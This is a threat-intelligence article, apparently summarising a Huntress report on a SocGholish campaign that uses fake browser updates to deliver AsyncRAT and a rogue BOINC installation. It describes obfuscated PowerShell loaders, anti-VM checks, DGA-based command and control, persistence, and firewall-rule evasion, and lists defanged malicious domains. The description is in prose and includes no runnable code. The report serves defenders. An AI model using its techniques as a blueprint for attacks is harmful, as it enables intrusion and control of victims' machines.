Malware Chain With Signs of SocGholish Exploits BOINC Software

A malware campaign, appearing to utilize SocGholish (also known as FakeUpdates), has been used to distribute AsyncRAT and exploit the BOINC (Berkeley Open Infrastructure Network Computing Client) on July 4, 2024. Huntress uncovered that the campaign targets individuals by distributing malicious JavaScript files through compromised websites, leading to the execution of fake browser update prompts. Upon user interaction, these prompts initiate a multi-stage infection chain with Huntress explaining, "two disjointed chains occur, with one resulting in a fileless variant of AsyncRAT and the other ending in a malicious BOINC (Berkeley Open Infrastructure Network Computing Client) installation." These tactics, techniques, and procedures (TTPs) were found to have significant overlap with previous SocGholish campaigns, as well as with behaviors observed in reports from the BOINC project forum. This campaign incorporates advanced obfuscation techniques, which are abundantly seen in PowerShell scripts and the use of legitimate software for malicious purposes.

The infection chain begins with a malicious JavaScript file that downloads additional payloads. The PowerShell loaders used are heavily obfuscated, with Huntress identifying its use of character arrays and complex encoding schemes to evade detection. The script proceeds through multiple stages of decoding and decryption, eventually running commands via PowerShell's Invoke-Expression (IEX) to execute the next stage. This technique includes Anti-VM checks that contribute to a "VM threshold" score, determining whether the malware will continue execution based on the virtual environment. Using a Domain Generation Algorithm (DGA) to connect to command and control (C2) servers is another example of the campaign's evasion efforts. One of the final payloads involves AsyncRAT communicating with a recently registered domain on July 11, 2024.

In addition, the campaign installs BOINC software using a PowerShell WebRequest (curl alias) to download and execute the installation package. The script creates registry entries under "HKCU:\Software\Microsoft" and schedules tasks to maintain persistence. BOINC, typically used for legitimate distributed computing projects, is abused to connect to rogue servers that can issue commands and collect data from the infected hosts. Huntress identified two servers, rosettahome[.]cn and rosettahome[.]top, with WHOIS records showing recent registration dates of June 23, 2024, and June 15, 2024, respectively. As of 12:45 PM PST on July 15, 2024, there were 8,453 clients connected to rosettahome[.]cn and 1,579 clients connected to rosettahome[.]top. Despite numerous active connections, Huntress noted that no computational tasks were executed, suggesting the threat actors might use BOINC for initial access and reconnaissance rather than immediate exploitation.

Throughout the intrusion, Huntress observed additional suspicious activities, including the frequent use of PowerShell commands to retrieve payloads using Invoke-WebRequest, Invoke-Expression, and curl, run discovery of local administrators, and establish persistent C2 connections via headless conhost.exe commands. Defense evasion tactics involved creating a new firewall rule to add an exception in the Windows firewall to allow a DLL to communicate through the firewall under the name "SystemUpdate." The use of common administrative tools like net.exe and netsh.exe for discovery and firewall configuration highlights the adversaries' efforts to blend malicious activities with legitimate system operations.